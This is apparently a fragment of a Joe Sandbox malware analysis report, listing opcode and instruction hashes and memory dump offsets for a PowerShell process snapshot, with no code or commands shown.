                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                        • Instruction ID: c99a587b07fa8e4232d89273f53aad52cedc6b24514805d98b2c6e57877fa274
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E41E43131581C8FDAA8EB1CE898EA877E1FF6831271505E6E44ACB271DA26DC81CB40
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: cec4accbe2e06e501214a98683e2284c2f3a652b4fc5da3832229ffbca79f630
                                                                                                                                                                                                                        • Instruction ID: f594033122d1dcbdac363350a5e73201707dbbe6c73b2f58b204e9f6c8f6e7f0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cec4accbe2e06e501214a98683e2284c2f3a652b4fc5da3832229ffbca79f630
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5341AF25F0C90E4FEBA5EA1898A93BD36E1EF99351F44017AE50ED7382DE2C6C418381
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 0c2f1ee1c61586f5d660ad94efdac7ddfb6256b1586409c2a2a4d33c9be4017d
                                                                                                                                                                                                                        • Instruction ID: d032798549068e4671d606e71d3003b101adaf3df54626c3f74f0a4bdf5ad451
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c2f1ee1c61586f5d660ad94efdac7ddfb6256b1586409c2a2a4d33c9be4017d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52418F20F0C90A4FEAE5F66D94A4AB973D1EF66314B640579D10ECB396DD2CEC81A740
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 0750aeb96cfb552551d8a51f7e206192dd093969cae581f12e52dad08a980e82
                                                                                                                                                                                                                        • Instruction ID: 321ffa8529c550f39052bed1d0c7371006928e3790f8079e0eaf9d13db87ca6a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0750aeb96cfb552551d8a51f7e206192dd093969cae581f12e52dad08a980e82
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01419F35F0CA0E4FEBA5EA6894A63BD37E1EF5A310F00017AE50DD7382DE2D68459781
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: cc37b2a84030bccd8d383679843b0b38bb2e6eb5717b1073e1f280f9a965b295
                                                                                                                                                                                                                        • Instruction ID: 76bea8ff0063fe785f9c7eff5446f7b5c94e9f1e1b622593f7179bd3668f7565
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc37b2a84030bccd8d383679843b0b38bb2e6eb5717b1073e1f280f9a965b295
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06415B21F0CA050FE7A6A63C58A96B67BC1DF9B250F08057FD54DCB3D2DC1DA8429341
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 1733531fc2e534ae8e2a3dc198e9f7cbf4604467868888713e7023e8b82e88b7
                                                                                                                                                                                                                        • Instruction ID: 12f2659e75188abf20c336275febfc20e370428dc57110afae2fab45f19853a4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1733531fc2e534ae8e2a3dc198e9f7cbf4604467868888713e7023e8b82e88b7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B41D435E0CA4A4FEBA6EB2894A53BD3BE1EF56310F0401BAD50DD72D2CE2C68458781
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 599b6f2aa72183e04c77089eb52701389debdbdc5e1c6f6051703d853043dd02
                                                                                                                                                                                                                        • Instruction ID: a901bb18b26e13d8c112377004afc65c7c5bb72e03962355fc5104a3d989d993
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 599b6f2aa72183e04c77089eb52701389debdbdc5e1c6f6051703d853043dd02
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1231B331F0894A4FEBA5EB2CC4A4B6477D1EF9A360B0445B9D14ECB392DE1DAC42D740
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 52a4804034793b39d2fa28adbb64ae68d20bab39eeb8e0e3497f933a5668f528
                                                                                                                                                                                                                        • Instruction ID: 5bc19304e6d7272658958a6222e1df877c0bcd704cc82eae0eeb43998a28b693
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52a4804034793b39d2fa28adbb64ae68d20bab39eeb8e0e3497f933a5668f528
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9319035F0CA0E4FEB95EA18A4A53BD76E1EF59310F44017AE90DD73C1CE2C68509781
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 3116574840e80028a00bb5703fea6083eb8945ba3b7437c01ca05ebdca54ec17
                                                                                                                                                                                                                        • Instruction ID: bfda0092bc8dde186f4b3b8271d90c5c08a45f74257005df8b606391fc214425
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3116574840e80028a00bb5703fea6083eb8945ba3b7437c01ca05ebdca54ec17
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4421CF30628E4D4FC7D9EA2CC4D89A577E2FF5931534905BDD18ACBAA2DA28FC41C700
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 967f6d9d04dfaad2bd3526e09da8272717305649f6e994258f74027809201410
                                                                                                                                                                                                                        • Instruction ID: 7475a2da37afb87971fcb818ee8d502783114030f94f718ceb132c6f70c61003
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 967f6d9d04dfaad2bd3526e09da8272717305649f6e994258f74027809201410
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB212620F0CE490FE795B62C58B62B97BD1DF9A215B0401BFD54EC7392CD1DA8028741
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: e7371700ceaa724dd8eb4290d3f6b2a1fee9b9fdbcae728f2860f4480d0d78ca
                                                                                                                                                                                                                        • Instruction ID: 34570b9f9a78bebd99b088b8d6262f032d17d50f2da4f6270356ba7790b3481b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7371700ceaa724dd8eb4290d3f6b2a1fee9b9fdbcae728f2860f4480d0d78ca
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5311633570D8984FD795EB2CE8A89657BE1EF6A31230504F7D089CB272D915EC80C741
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 4310dde0ce01a50ba766a30300334aad9862d2bdcac39d3f7f6c4a406e3930f4
                                                                                                                                                                                                                        • Instruction ID: 61227375718b7272a4cd9fb7d0606776e09aeba97554b8804ec77884a869c85e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4310dde0ce01a50ba766a30300334aad9862d2bdcac39d3f7f6c4a406e3930f4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54118035E4C9890FD712A6248CA08E67BD5EB87310B0501BAD55DCB292D95D6847C381
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 4b37a901240c470b1fad83349d306778b764b6fc58dfcd9d18dae0420105cacb
                                                                                                                                                                                                                        • Instruction ID: 816974684d1b3c08ae35bd19feba2423f475a27a77c91e2d35e62f9374f522d7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b37a901240c470b1fad83349d306778b764b6fc58dfcd9d18dae0420105cacb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23114930A0CA494FDB95DB29C494F5177E1FF56350F1544A9D14DCF2A2CA69EC82CB41
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                        • Instruction ID: 5d7fcb5bbf17594a2fd62b4d39bec78ad26d850823527c364f545537ea33e4f1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5001677121CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3665DB36E882CB45
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 873c5b8458baf2acb5a659d4924f1c0596b04395749e71c79ed02993c7a0fa1d
                                                                                                                                                                                                                        • Instruction ID: 49b16cf16da2c21d6977bb59112666b4ab0b234057235d57d5a8cc2c3fe9a835
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 873c5b8458baf2acb5a659d4924f1c0596b04395749e71c79ed02993c7a0fa1d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9F02836F1990C06EF019958AC60498B790EB87354F04007AE91CD7281D66E5841C305